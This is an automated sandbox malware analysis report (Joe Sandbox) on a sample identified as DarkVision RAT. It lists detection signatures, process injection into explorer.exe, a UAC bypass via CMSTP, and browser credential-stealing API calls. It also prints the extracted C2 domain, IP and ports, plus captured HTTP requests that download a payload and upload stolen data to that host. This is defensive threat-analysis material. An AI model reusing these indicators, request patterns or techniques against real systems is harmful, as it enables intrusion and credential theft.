Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uncrypted.exe

Overview

General Information

Sample name:uncrypted.exe
Analysis ID:1582630
MD5:84e8a17e39ef16dce73da924ced012d5
SHA1:630f2eb6046e05450c10af2a4ae01840e0a19405
SHA256:bebe3cadd1d51412d055ba11ebc64091c45e2ef47dbcc7135d2d762f26a466c2
Tags:exeuser-lontze7
Infos:

Detection

DarkVision Rat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal saved passwords of Firefox
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Searches for specific processes (likely to inject)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Remote Thread Creation By Uncommon Source Image
Stores large binary data to the registry
Terminates after testing mutex exists (may check infected machine status)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • uncrypted.exe (PID: 3856 cmdline: "C:\Users\user\Desktop\uncrypted.exe" MD5: 84E8A17E39EF16DCE73DA924CED012D5)
    • uncrypted.exe (PID: 2892 cmdline: "C:\Users\user\Desktop\uncrypted.exe" MD5: 84E8A17E39EF16DCE73DA924CED012D5)
      • explorer.exe (PID: 5060 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
        • explorer.exe (PID: 5032 cmdline: C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C} MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Configuration

Threatname: DarkVision Rat

{"C2": "jholo.duckdns.org", "Port": 8900}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
    00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
        00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.uncrypted.exe.400000.0.raw.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
              2.2.uncrypted.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                2.2.uncrypted.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x34588:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x344c8:$s1: CoGetObject
                • 0x34550:$s2: Elevation:Administrator!new:
                2.2.uncrypted.exe.11edea0.1.raw.unpackJoeSecurity_DarkVisionRatYara detected DarkVision RatJoe Security
                  2.2.uncrypted.exe.11edea0.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 20 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Remote Thread Creation By Uncommon Source Image
                    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 5060, StartAddress: 790000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 5032

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-31T07:33:04.802221+010020456181A Network Trojan was detected192.168.2.5497065.89.185.1568900TCP
                    2024-12-31T07:33:13.838339+010020456181A Network Trojan was detected192.168.2.5497075.89.185.1568900TCP
                    2024-12-31T07:33:22.853752+010020456181A Network Trojan was detected192.168.2.5497205.89.185.1568900TCP
                    2024-12-31T07:33:31.892912+010020456181A Network Trojan was detected192.168.2.5497815.89.185.1568900TCP
                    2024-12-31T07:33:40.927898+010020456181A Network Trojan was detected192.168.2.5498375.89.185.1568900TCP
                    2024-12-31T07:33:49.983774+010020456181A Network Trojan was detected192.168.2.5498985.89.185.1568900TCP
                    2024-12-31T07:33:58.994424+010020456181A Network Trojan was detected192.168.2.5499605.89.185.1568900TCP
                    2024-12-31T07:34:08.143325+010020456181A Network Trojan was detected192.168.2.5499855.89.185.1568900TCP
                    2024-12-31T07:34:17.166204+010020456181A Network Trojan was detected192.168.2.5499865.89.185.1568900TCP
                    2024-12-31T07:34:26.197336+010020456181A Network Trojan was detected192.168.2.5499875.89.185.1568900TCP
                    2024-12-31T07:34:35.228839+010020456181A Network Trojan was detected192.168.2.5499885.89.185.1568900TCP
                    2024-12-31T07:34:44.244638+010020456181A Network Trojan was detected192.168.2.5499895.89.185.1568900TCP
                    2024-12-31T07:34:53.025515+010020456181A Network Trojan was detected192.168.2.5499905.89.185.1568900TCP
                    2024-12-31T07:35:01.478246+010020456181A Network Trojan was detected192.168.2.5499915.89.185.1568900TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: uncrypted.exeAvira: detected
                    Found malware configuration
                    Source: 3.2.explorer.exe.1190000.0.unpackMalware Configuration Extractor: DarkVision Rat {"C2": "jholo.duckdns.org", "Port": 8900}
                    Multi AV Scanner detection for submitted file
                    Source: uncrypted.exeVirustotal: Detection: 61%Perma Link
                    Source: uncrypted.exeReversingLabs: Detection: 60%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: uncrypted.exeJoe Sandbox ML: detected
                    Source: C:\Windows\explorer.exeCode function: 3_2_011953B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,3_2_011953B0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011ADC00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,3_2_011ADC00
                    Source: C:\Windows\explorer.exeCode function: 3_2_011ADD1E CryptReleaseContext,CryptDestroyHash,3_2_011ADD1E
                    Source: C:\Windows\explorer.exeCode function: 3_2_011ADD5A CryptReleaseContext,CryptDestroyHash,3_2_011ADD5A
                    Source: C:\Windows\explorer.exeCode function: 3_2_011ADD8F CryptReleaseContext,CryptDestroyHash,3_2_011ADD8F
                    Source: C:\Windows\explorer.exeCode function: 3_2_011ADCF7 CryptReleaseContext,CryptDestroyHash,3_2_011ADCF7
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E751C0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E751C0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E7A390 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E7A390
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E754C0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,4_2_00E754C0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E748C0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E748C0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E799B0 CryptBinaryToStringW,RegGetValueW,4_2_00E799B0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E79AE0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,4_2_00E79AE0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E74BC0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E74BC0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E79C20 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,4_2_00E79C20
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E76D60 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,4_2_00E76D60
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E74EC0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,4_2_00E74EC0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E76530 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,4_2_00E76530
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E7A690 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,4_2_00E7A690
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E79DAF CryptReleaseContext,CryptDestroyHash,4_2_00E79DAF
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E73D60 CryptStringToBinaryA,4_2_00E73D60
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E79D7A CryptReleaseContext,CryptDestroyHash,4_2_00E79D7A
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E79D3E CryptReleaseContext,CryptDestroyHash,4_2_00E79D3E
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E75D00 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,4_2_00E75D00
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E79D17 CryptReleaseContext,CryptDestroyHash,4_2_00E79D17

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.uncrypted.exe.11edea0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.4081f90.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.uncrypted.exe.41021c0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: uncrypted.exe PID: 3856, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: uncrypted.exe PID: 2892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5060, type: MEMORYSTR

                    Compliance

                    barindex
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\uncrypted.exeUnpacked PE file: 0.2.uncrypted.exe.9a0000.0.unpack
                    Source: uncrypted.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: uncrypted.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\uncrypted.exeCode function: 2_2_0041DB70 WaitForSingleObject,LocalAlloc,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,RemoveDirectoryW,GetLastError,LocalFree,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,2_2_0041DB70
                    Source: C:\Windows\explorer.exeCode function: 3_2_011997F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,3_2_011997F0
                    Source: C:\Windows\explorer.exeCode function: 4_2_00E77EA0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,4_2_00E77EA0

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49707 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49720 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49781 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49837 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49898 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49960 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49986 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49987 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49989 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49991 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49985 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49990 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49988 -> 5.89.185.156:8900
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.5:49706 -> 5.89.185.156:8900
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 5.89.185.156 8181Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: jholo.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: jholo.duckdns.org
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 5.89.185.156:8181
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 31 Dec 2024 06:33:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 11 Nov 2024 02:14:28 GMTETag: "f9600-62699a90923c5"Accept-Ranges: bytesContent-Length: 1021440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 c8 8b 75 ed a9 e5 26 ed a9 e5 26 ed a9 e5 26 f6 34 7b 26 e7 a9 e5 26 e4 d1 62 26 ec a9 e5 26 e4 d1 76 26 fc a9 e5 26 ed a9 e4 26 72 a9 e5 26 f6 34 4e 26 d9 a9 e5 26 f6 34 4f 26 90 a9 e5 26 f6 34 78 26 ec a9 e5 26 52 69 63 68 ed a9 e5 26 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 84 68 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 44 0d 00 00 b6 02 00 00 00 00 00 b8 49 0c 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 10 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 6e 0e 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 40 65 00 00 00 00 00 00 00 00 00 00 00 10 10 00 08 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 42 0d 00 00 10 00 00 00 44 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 1f 01 00 00 60 0d 00 00 20 01 00 00 48 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 13 01 00 00 80 0e 00 00 ac 00 00 00 68 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 65 00 00 00 a0 0f 00 00 66 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9a 1a 00 00 00 10 10 00 00 1c 00 00 00 7a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: Joe Sandbox ViewASN Name: VODAFONE-IT-ASNIT VODAFONE-IT-ASNIT
                    Source: global trafficHTTP traffic detected: GET /PASSWORDRECOVERY64EXE.EXE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: jholo.duckdns.org:8181
                    Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: jholo.duckdns.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 422
                    Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: jholo.duckdns.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 417
                    Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: jholo.duckdns.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 541
                    Source: global trafficHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: jholo.duckdns.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 536
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\explorer.exeCode function: 3_2_011B34A0 recv,3_2_011B34A0
                    Source: global trafficHTTP traffic detected: GET /PASSWORDRECOVERY64EXE.EXE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: jholo.duckdns.org:8181
                    Source: global trafficDNS traffic detected: DNS query: jholo.duckdns.org
                    Source: unknownHTTP traffic detected: POST /upload.php HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=partHost: jholo.duckdns.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 422
                    Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/
                    Source: explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/L
                    Source: uncrypted.exe, 00000000.00000002.2055171521.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000004175000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000002.00000002.2041122621.0000000000475000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/PASSWORDRECOVERY32EXE.EXEhttp://jholo.duckdns.org:8181/PASSWORDRECOVER
                    Source: explorer.exe, explorer.exe, 00000003.00000003.2659390305.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291325405.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291451466.0000000000F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE
